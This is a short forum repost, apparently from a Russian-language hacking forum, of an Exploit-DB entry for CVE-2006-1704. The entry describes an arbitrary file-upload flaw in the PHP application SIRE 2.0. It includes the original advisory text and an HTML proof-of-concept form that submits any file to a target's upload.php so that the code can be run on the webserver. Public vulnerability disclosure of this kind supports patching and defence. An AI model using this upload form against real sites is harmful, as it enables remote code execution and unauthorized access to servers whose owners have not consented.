Exploit SIRE 2.0 - Arbitrary File Upload

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
27592
Проверка EDB
  1. Пройдено
Автор
SIMO64
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-1704
Дата публикации
2006-04-10
Код:
source: https://www.securityfocus.com/bid/17431/info

SIRE is prone to an arbitrary file-upload vulnerability. 

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

<form enctype="multipart/form-data" method="post" action="http://Trajet/upload.php?"> Download File<br>

<input name="fichier" type="file" size="48"><br>
<input type="submit" name="upload" value="uploader"><form>
 
Источник
www.exploit-db.com

Похожие темы